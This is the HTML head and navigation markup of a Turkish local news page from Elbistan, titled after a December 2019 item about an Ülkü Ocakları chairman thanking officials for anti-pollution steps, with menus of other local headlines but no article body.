
<!DOCTYPE html> <html lang="tr" class="no-inlinesvgsite-center" itemscope itemtype="http://schema.org/NewsArticle"> <head> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7914883170465839", enable_page_level_ads: true }); </script> <title>Ülkü Ocakları Başkanı Kaya’dan çevre hassasiyeti teşekkürü</title> <meta charset="utf-8"> <!--meta name="viewport" content="width=device-width, initial-scale=1.0"--> <meta name="description" content="Elbistan Ülkü Ocakları Başkanı Muhammet Kaya ilçede yaşanan hava ve çevre kirliliğinin önüne geçilmesi noktasında gerekli adımları atan başta Cumhurbaşkanı"> <meta name="keywords" content=""> <meta name="news_keywords" content=""> <meta name="author" content="Elbistanın Sesi" /> <meta property="fb:admins" content=""> <meta property="og:site_name" content="Elbistanın Sesi"> <meta property="og:title" content="Ülkü Ocakları Başkanı Kaya’dan çevre hassasiyeti teşekkürü"> <meta property="og:description" content="Elbistan Ülkü Ocakları Başkanı Muhammet Kaya ilçede yaşanan hava ve çevre kirliliğinin önüne geçilmesi noktasında gerekli adımları atan başta Cumhurbaşkanı"> <meta property="og:url" content="http://www.elbistaninsesi.com/guncel/ulku-ocaklari-baskani-kayadan-cevre-hassasiyeti-tesekkuru-h64970.html"> <meta property="og:image" content="http://www.elbistaninsesi.com/images/haberler/2019/12/ulku_ocaklari_baskani_kayadan_cevre_hassasiyeti_tesekkuru_h64970_649b7.jpg"> <meta property="og:type" content="article"> <meta http-equiv="refresh" content="3000"> <meta name="twitter:card" content="summary_large_image"> <meta name="og:title" content="Ülkü Ocakları Başkanı Kaya’dan çevre hassasiyeti teşekkürü"> <meta name="twitter:url" content="http://www.elbistaninsesi.com/guncel/ulku-ocaklari-baskani-kayadan-cevre-hassasiyeti-tesekkuru-h64970.html"> <meta name="twitter:domain" content="http://www.elbistaninsesi.com/"> <meta name="twitter:site" content="elbistaninsesi"> <meta name="twitter:title" content="Ülkü Ocakları Başkanı Kaya’dan çevre hassasiyeti teşekkürü"> <meta name="twitter:description" content=" Elbistan Ülkü Ocakları Başkanı Muhammet Kaya, ilçede yaşanan hava ve çevre kirliliğinin önüne geçilmesi noktasında gerekli adımları atan başta Cumhurbaşkanı Recep Tayyip Erdoğan ve ilçemin mülki-idari amirlerine teşekkür etti."> <meta name="twitter:image:src" content="http://www.elbistaninsesi.com/images/haberler/2019/12/ulku_ocaklari_baskani_kayadan_cevre_hassasiyeti_tesekkuru_h64970_649b7.jpg"> <link rel="alternate" href="http://www.elbistaninsesi.com/" hreflang="tr-default" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/compress.css" rel="stylesheet" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/print.css" rel="stylesheet" media="print, handheld"> <link rel="alternate" type="application/rss+xml" title="RSS servisi" href="http://www.elbistaninsesi.com/rss.php" /> <link href='http://fonts.googleapis.com/css?family=Oswald&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link href="https://fonts.googleapis.com/css?family=PT+Sans:400,700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link href='http://fonts.googleapis.com/css?family=Roboto:400,400italic,500,500italic,700&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link href="http://fonts.googleapis.com/css?family=Roboto+Slab:700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link rel="canonical" href=""> <link rel="publisher" href="#" /> <link rel="image_src" type="image/jpeg" href="http://www.elbistaninsesi.com/images/haberler/2019/12/ulku_ocaklari_baskani_kayadan_cevre_hassasiyeti_tesekkuru_h64970_649b7.jpg" /> <meta itemprop="headline" content="Ülkü Ocakları Başkanı Kaya’dan çevre hassasiyeti teşekkürü" /> <meta itemprop="thumbnailUrl" content="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/ulku_ocaklari_baskani_kayadan_cevre_hassasiyeti_tesekkuru_h64970_649b7.jpg" /> <meta itemprop="articleSection" content="Güncel" name="section" /> <meta itemprop="dateCreated" content="2019-12-03T18:49:57+02:00" /> <meta itemprop="image" content="http://www.elbistaninsesi.com/images/haberler/2019/12/ulku_ocaklari_baskani_kayadan_cevre_hassasiyeti_tesekkuru_h64970_649b7.jpg" /> <meta itemprop="genre" content="news" name="medium" /> <meta itemprop="inLanguage" content="tr-TR" /> <meta itemprop="keywords" content="" name="keywords" /> <!--[if gte IE 9]> <style type="text/css"> .gradient { filter: none; } </style> <![endif]--> <!--[if IE 7]> <style type="text/css"> .reklam.dikey.sol .fixed { margin-left:-px; } </style> <![endif]--> <script type="text/javascript"> var site_url = 'http://www.elbistaninsesi.com/'; var tema = 'hs-rush-php'; var theme_path = 'http://www.elbistaninsesi.com/_themes/hs-rush-php/'; var ajax_url = '_ajax/'; var cat_limit = '10'; var headerayar = 'header_genis'; var poll_voted = ''; var comment_approved = '0'; var doviz = '1'; var lazyload = '0'; var twitter_user = 'elbistaninsesi'; var facebook_user = 'elbistaninsesi'; var popup_saat = '1'; var yorum_harf_ayar = '1'; var hava = '0'; var hava_default = '15888'; var namaz = '1'; var iftara_kalan_sure = '0'; var namaz_default = 'kahramanmaras'; var superlig = '1'; var uye_gir = 'Üye Girişi'; var uye_ol = 'Üye Ol'; var cikis_yap = 'Çıkış Yap'; var baglan_fb = 'Facebook ile Bağlan'; var analitik_ga = 'UA-21655627-1'; </script> <!--[if lt IE 9]> <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7533583759274488", enable_page_level_ads: true }); </script> </head> <body> <!-- HEADER --> <div id="siteHeader" class="header fluid row-fluid"> <div id="header-top" class="header-top row-fluid"> <div class="header-top-container"> <div class="header-top-block header-top-cycle"> <div class="header-top-currency"> <div class="currency-cycle"> <div class="currency-dolar glyphicons white usd">DOLAR <span class="currency-rate"></span></div> <div class="currency-euro glyphicons white euro">EURO <span class="currency-rate"></span></div> <div class="currency-altin glyphicons white coins">ALTIN <span class="currency-rate"></span></div> <div class="currency-bist glyphicons white global">BIST <span class="currency-rate"></span></div> </div> </div> <div class="header-top-hot mleft"> <div class="hot-cycle"> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/araba-fiyatina-ulasan-kurbanliklar-alici-bekliyor-h63829.html" title="Araba fiyatına ulaşan kurbanlıklar alıcı bekliyor" >Araba fiyatına ulaşan kurbanlıklar alıcı bekliyor</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/komur-sahasinda-gocuk-1-isci-hayatini-kaybetti-h60703.html" title="Kömür sahasında göçük: 1 işçi hayatını kaybetti" >Kömür sahasında göçük: 1 işçi hayatını kaybetti</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/unal-stk-temsilcileri-ile-sahurda-bulustu-h57204.html" title="Ünal STK temsilcileri ile sahurda buluştu" >Ünal STK temsilcileri ile sahurda buluştu</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/arslan-kudus-sahipsiz-degildir-h57124.html" title="Arslan: “Kudüs sahipsiz değildir”" >Arslan: “Kudüs sahipsiz değildir”</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/politika/oztunc-24-haziranda-elbistanda-sandiklari-patlatacagiz-h56762.html" title="Öztunç: “24 Haziran’da Elbistan’da sandıkları patlatacağız”" >Öztunç: “24 Haziran’da Elbistan’da sandıkları patlatacağız”</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/ekonomi/kahramanmaras-kivisi-tezgahlardaki-yerini-aldi-h49076.html" title="Kahramanmaraş kivisi tezgahlardaki yerini aldı" >Kahramanmaraş kivisi tezgahlardaki yerini aldı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/politika/ak-partili-debgici-yeniden-aday-h49075.html" title="AK Parti’li Debgici yeniden aday" >AK Parti’li Debgici yeniden aday</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/haberde-insan/kadinlarin-kislik-yufka-ekmek-telasi-h49074.html" title="Kadınların kışlık yufka ekmek telaşı" >Kadınların kışlık yufka ekmek telaşı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/asayis/keci-otlatirken-kayaliklardan-dustu-h48619.html" title="Keçi otlatırken kayalıklardan düştü" >Keçi otlatırken kayalıklardan düştü</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/egitim/dulkadiroglundan-egitime-destek-h48618.html" title="Dulkadiroğlu’ndan eğitime destek" >Dulkadiroğlu’ndan eğitime destek</a> </div> </div> </div> </div> <div class="header-top-block header-top-right"> <div class="header-top-user"> <div class="btn-group"> <button class="btn btn-user dropdown-toggle glyphicons white keys" data-toggle="dropdown"></button> <ul id="memberArea" class="dropdown-menu"> </ul> </div> </div> </div> <div id="sb-search" class="header-top-block header-top-search sb-search"> <form action="http://www.elbistaninsesi.com/" method="get"> <input type="hidden" name="m" value="arama"> <input class="sb-search-input" placeholder="Haber Ara ..." type="search" name="q" id="search"> <input type="hidden" name="auth" value="546df4ca83579a2fe2584d18eaf584bebc37bc8f" /> <input class="sb-search-submit" type="submit" value=""> <span class="sb-icon-search"></span> </form> </div> </div> </div> <div id="logo" class="row-fluid"> <div class="container"> <div class="span3"> <span class="logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_2.jpg" alt="Ülkü Ocakları Başkanı Kaya’dan çevre hassasiyeti teşekkürü" /></a></span> </div> </div> </div> <div id="menu" class="row-fluid"> <div class="kategori"> <div class="container"> <a href="http://www.elbistaninsesi.com/" class="darken glyphicons home"></a> <a href="http://www.elbistaninsesi.com/yazarlar.html" class="blue glyphicons group">Yazarlar</a> <a title="Vefatlar" href="http://www.elbistaninsesi.com/vefatlar" id="k7" >Vefatlar</a> <a title="Güncel" href="http://www.elbistaninsesi.com/guncel" id="k8" class="current" >Güncel</a> <a title="Politika" href="http://www.elbistaninsesi.com/politika" id="k2" >Politika</a> <a title="Sağlık" href="http://www.elbistaninsesi.com/saglik" id="k4" >Sağlık</a> <a title="Eğitim / Kültür" href="http://www.elbistaninsesi.com/egitim-kultur" id="k5" >Eğitim / Kültür</a> <a title="Spor" href="http://www.elbistaninsesi.com/spor" id="k1" >Spor</a> <a title="Ekonomi" href="http://www.elbistaninsesi.com/ekonomi" id="k3" >Ekonomi</a> <a title="Arşiv Özel" href="http://www.elbistaninsesi.com/arsiv-ozel" id="k9" >Arşiv Özel</a> <a title="Seçim Sonucu" href="http://www.elbistaninsesi.com/secim-sonucu" id="k13" >Seçim Sonucu</a> <a title="YEREL" href="http://www.elbistaninsesi.com/yerel" id="k17" >YEREL</a> <div class="other pull-right"><a href="#" class="all" title="Diğer Kategoriler">TÜM KATEGORİLER</a></div> <div class="othercat"> <div class="inner"> <div class="clearfix"> <a title="ASAYİŞ" href="http://www.elbistaninsesi.com/asayis" id="k19" >ASAYİŞ</a> <a title="KÜLTÜR-SANAT" href="http://www.elbistaninsesi.com/kultur-sanat" id="k20" >KÜLTÜR-SANAT</a> <a title="GENEL" href="http://www.elbistaninsesi.com/genel" id="k21" >GENEL</a> <a title="DÜNYA" href="http://www.elbistaninsesi.com/dunya" id="k22" >DÜNYA</a> <a title="EĞİTİM" href="http://www.elbistaninsesi.com/egitim" id="k48" >EĞİTİM</a> <a title="ÇEVRE" href="http://www.elbistaninsesi.com/cevre" id="k53" >ÇEVRE</a> <a title="MAGAZİN" href="http://www.elbistaninsesi.com/magazin" id="k60" >MAGAZİN</a> <a title="HABERDE İNSAN" href="http://www.elbistaninsesi.com/haberde-insan" id="k71" >HABERDE İNSAN</a> </div> </div> </div> </div> </div> <div id="katicerik" class="row-fluid"> <div class="container"><div class="katelement kat_k7"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/ayse-yener-76-yasinda-h64964.html" title="Ayşe Yener 76 yaşında,"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/ayse_yener_76_yasinda_h64964_2b59d.jpg" alt="Ayşe Yener 76 yaşında," /> Ayşe Yener 76 yaşında,</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/mehmet-ozturk-86-yasinda-h64963.html" title="Mehmet Öztürk 86 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/mehmet_ozturk_86_yasinda_h64963_e377c.jpg" alt="Mehmet Öztürk 86 yaşında" /> Mehmet Öztürk 86 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/vefat-tesekkur-h64962.html" title="vefat teşekkür"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/vefat_tesekkur_h64962_46012.jpg" alt="vefat teşekkür" /> vefat teşekkür</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/durmus-ali-cengiz-92-yasinda-h64956.html" title="Durmuş Ali Cengiz 92 yaşında,"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/durmus_ali_cengiz_92_yasinda_h64956_4eba9.jpg" alt="Durmuş Ali Cengiz 92 yaşında," /> Durmuş Ali Cengiz 92 yaşında,</a> </div> </div></div><div class="katelement kat_k8"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/bariyerlere-carpan-motosikletin-surucusu-hayatini-kaybetti-h64972.html" title="Bariyerlere çarpan motosikletin sürücüsü hayatını kaybetti"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/bariyerlere_carpan_motosikletin_surucusu_hayatini_kaybetti_h64972_ce48e.JPG" alt="Bariyerlere çarpan motosikletin sürücüsü hayatını kaybetti" /> Bariyerlere çarpan motosikletin sürücüsü hayatını kaybetti</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/baskan-gurbuz-engel-yok-sevgi-var-h64971.html" title="Başkan Gürbüz, “Engel yok sevgi var”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/baskan_gurbuz_engel_yok_sevgi_var_h64971_657c6.jpg" alt="Başkan Gürbüz, “Engel yok sevgi var”" /> Başkan Gürbüz, “Engel yok sevgi var”</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/ulku-ocaklari-baskani-kayadan-cevre-hassasiyeti-tesekkuru-h64970.html" title="Ülkü Ocakları Başkanı Kaya’dan çevre hassasiyeti teşekkürü"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/ulku_ocaklari_baskani_kayadan_cevre_hassasiyeti_tesekkuru_h64970_649b7.jpg" alt="Ülkü Ocakları Başkanı Kaya’dan çevre hassasiyeti teşekkürü" /> Ülkü Ocakları Başkanı Kaya’dan çevre hassasiyeti teşekkürü</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/polisten-tekerlekli-sandalye-hediyesi-h64969.html" title="Polisten tekerlekli sandalye hediyesi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/polisten_tekerlekli_sandalye_hediyesi_h64969_82716.JPG" alt="Polisten tekerlekli sandalye hediyesi" /> Polisten tekerlekli sandalye hediyesi</a> </div> </div></div><div class="katelement kat_k2"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/mhp-meclis-uyelerinden-birlik-ve-beraberlik-iftari-h63165.html" title="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/mhp_meclis_uyelerinden_birlik_ve_beraberlik_iftari_h63165_540b4.JPG" alt="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı" /> MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/baskan-eker-mazbatasini-aldi-h62471.html" title="Başkan Eker, mazbatasını aldı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/baskan_eker_mazbatasini_aldi_h62471_6d495.JPG" alt="Başkan Eker, mazbatasını aldı" /> Başkan Eker, mazbatasını aldı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/oztunctan-gungore-hayirli-olsun-ziyareti-h62469.html" title="Öztunç’tan Güngör’e hayırlı olsun ziyareti"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/oztunctan_gungore_hayirli_olsun_ziyareti_h62469_f4649.jpg" alt="Öztunç’tan Güngör’e hayırlı olsun ziyareti" /> Öztunç’tan Güngör’e hayırlı olsun ziyareti</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/iste-partilerin-oy-dagilimi-h62445.html" title="İşte partilerin oy dağılımı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/iste_partilerin_oy_dagilimi_h62445_7a2a4.JPG" alt="İşte partilerin oy dağılımı" /> İşte partilerin oy dağılımı</a> </div> </div></div><div class="katelement kat_k4"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/crown-dental-hasta-kabulune-basladi-h63790.html" title="Crown Dental hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/crown_dental_hasta_kabulune_basladi_h63790_f7c46.JPG" alt="Crown Dental hasta kabulüne başladı" /> Crown Dental hasta kabulüne başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/uzman-dr-erdinc-hatipsoylu-hasta-kabulune-basladi-h63781.html" title="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/uzman_dr_erdinc_hatipsoylu_hasta_kabulune_basladi_h63781_4e39a.JPG" alt="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı" /> Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/elbistanda-saglik-kadrosu-guclenmeye-devam-ediyor-h63436.html" title="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/elbistanda_saglik_kadrosu_guclenmeye_devam_ediyor_h63436_480cd.JPG" alt="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor" /> Elbistan’da sağlık kadrosu güçlenmeye devam ediyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/edh-obezite-cerrahisinde-soz-sahibi-olmaya-basladi-h63423.html" title="EDH, obezite cerrahisinde söz sahibi olmaya başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/edh_obezite_cerrahisinde_soz_sahibi_olmaya_basladi_h63423_4b617.JPG" alt="EDH, obezite cerrahisinde söz sahibi olmaya başladı" /> EDH, obezite cerrahisinde söz sahibi olmaya başladı</a> </div> </div></div><div class="katelement kat_k5"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/maras-savunmasi-belgeselinin-elbistan-bolumu-cekiliyor-h63426.html" title="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/maras_savunmasi_belgeselinin_elbistan_bolumu_cekiliyor_h63426_dfbd4.JPG" alt="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor" /> Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/otizmli-cocuklar-icin-ozel-etkinlik-h62473.html" title="Otizmli çocuklar için özel etkinlik"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/otizmli_cocuklar_icin_ozel_etkinlik_h62473_6209c.jpg" alt="Otizmli çocuklar için özel etkinlik" /> Otizmli çocuklar için özel etkinlik</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/kadinlara-yonelik-elde-maras-isi-el-nakiscisi-kursu-aciliyor-h61759.html" title="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/kadinlara_yonelik_elde_maras_isi_el_nakiscisi_kursu_aciliyor_h61759_488fe.jpg" alt="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor" /> Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/nurhak-kaymakamligindan-egitime-ozel-destek-h61699.html" title="Nurhak Kaymakamlığı’ndan eğitime özel destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Nurhak Kaymakamlığı’ndan eğitime özel destek" /> Nurhak Kaymakamlığı’ndan eğitime özel destek</a> </div> </div></div><div class="katelement kat_k1"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistanin-sultanlari-deplasmanda-yenildi-h64807.html" title="Elbistan’ın Sultanları, deplasmanda yenildi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/elbistanin_sultanlari_deplasmanda_yenildi_h64807_04865.jpg" alt="Elbistan’ın Sultanları, deplasmanda yenildi" /> Elbistan’ın Sultanları, deplasmanda yenildi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistansporda-kan-kaybi-suruyor-h64806.html" title="Elbistanspor’da kan kaybı sürüyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/elbistansporda_kan_kaybi_suruyor_h64806_8de20.JPG" alt="Elbistanspor’da kan kaybı sürüyor" /> Elbistanspor’da kan kaybı sürüyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistanspora-destek-cagrisi-h64681.html" title="Elbistanspor’a destek çağrısı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/elbistanspora_destek_cagrisi_h64681_b211e.jpg" alt="Elbistanspor’a destek çağrısı" /> Elbistanspor’a destek çağrısı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistanspor-evinde-sursuruspora-kukredi-h64659.html" title="Elbistanspor, evinde Sürsürüspor’a kükredi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/elbistanspor_evinde_sursuruspora_kukredi_h64659_f8aad.JPG" alt="Elbistanspor, evinde Sürsürüspor’a kükredi" /> Elbistanspor, evinde Sürsürüspor’a kükredi</a> </div> </div></div><div class="katelement kat_k3"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/baris-pinari-harekatinda-teror-orgutune-buyuk-darbe-h64435.html" title="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/baris_pinari_harekatinda_teror_orgutune_buyuk_darbe_h64435_aec94.jpg" alt="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe" /> Barış Pınarı Harekatı’nda terör örgütüne büyük darbe</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/etso-ve-teb-kredi-protokolu-imzaladi-h61756.html" title="ETSO ve TEB kredi protokolü imzaladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/etso_ve_teb_kredi_protokolu_imzaladi_h61756_7542a.jpg" alt="ETSO ve TEB kredi protokolü imzaladı" /> ETSO ve TEB kredi protokolü imzaladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/dogakadan-ekinozu-ve-nurhaktaki-yatirimlara-destek-h61675.html" title="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/dogakadan_ekinozu_ve_nurhaktaki_yatirimlara_destek_h61675_c61db.jpg" alt="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek" /> DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/tedavi-sureclerinde-meslek-sahibi-olacaklar-h60414.html" title="Tedavi süreçlerinde meslek sahibi olacaklar"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2018/10/tedavi_sureclerinde_meslek_sahibi_olacaklar_h60414_dbbab.JPG" alt="Tedavi süreçlerinde meslek sahibi olacaklar" /> Tedavi süreçlerinde meslek sahibi olacaklar</a> </div> </div></div><div class="katelement kat_k9"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-ekim-1968-pazartesi-h3006.html" title="17 EKİM 1968 PAZARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24401.jpg" alt="17 EKİM 1968 PAZARTESİ" /> 17 EKİM 1968 PAZARTESİ</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/13-ekim-1968-persembe-h3005.html" title="13 EKİM 1968 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24398.jpg" alt="13 EKİM 1968 PERŞEMBE" /> 13 EKİM 1968 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-agustos-1967-persembe-h2896.html" title="17 AĞUSTOS 1967 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24181.jpg" alt="17 AĞUSTOS 1967 PERŞEMBE" /> 17 AĞUSTOS 1967 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/30-mayis-1959-cumartesi-h2893.html" title="30 MAYIS 1959 CUMARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24174.jpg" alt="30 MAYIS 1959 CUMARTESİ" /> 30 MAYIS 1959 CUMARTESİ</a> </div> </div></div><div class="katelement kat_k13"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/16-nisan-2017-anayasa-degisikligi-referandumu-h39059.html" title="16 Nisan 2017 Anayasa Değişikliği Referandumu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/16_nisan_2017_anayasa_degisikligi_referandumu_h39059_39ce8.jpg" alt="16 Nisan 2017 Anayasa Değişikliği Referandumu" /> 16 Nisan 2017 Anayasa Değişikliği Referandumu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/1-kasim-2015-26-donem-milletvekili-genel-secimi-h39058.html" title="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/1_kasim_2015_26_donem_milletvekili_genel_secimi_h39058_aa012.jpg" alt="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi" /> 1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/7-haziran-2015-25-donem-milletvekili-genel-secimi-h30737.html" title="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2015-Genel-Secim-Sonuclari_297.jpg" alt="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi" /> 7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"></div></div><div class="katelement kat_k17"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/kmtso-baskani-zabun-ktm-tekstil-ve-moda-yolculuguna-yeni-bir-ivme-kazandiracak-h38463.html" title="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/kmtso_baskani_zabun_ktm_tekstil_ve_moda_yolculuguna_yeni_bir_ivme_kazandiracak.jpg" alt="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”" /> KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/minikler-kizilderililerin-sira-disi-dunyasini-kesfedecek-h38435.html" title="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek" /> Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/ogrenciler-hedefi-12den-vurmak-icin-yaristi-h38434.html" title="Öğrenciler hedefi 12’den vurmak için yarıştı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/ogrenciler_hedefi_12den_vurmak_icin_yaristi.jpg" alt="Öğrenciler hedefi 12’den vurmak için yarıştı" /> Öğrenciler hedefi 12’den vurmak için yarıştı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/piazzada-indirim-yarisi-h35825.html" title="Piazza’da indirim yarışı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/08/piazzada_indirim_yarisi.jpg" alt="Piazza’da indirim yarışı" /> Piazza’da indirim yarışı</a> </div> </div></div> </div> </div> </div> </div> <div id="mainContainer" class="container center shadow" style="padding-top:15px;"> 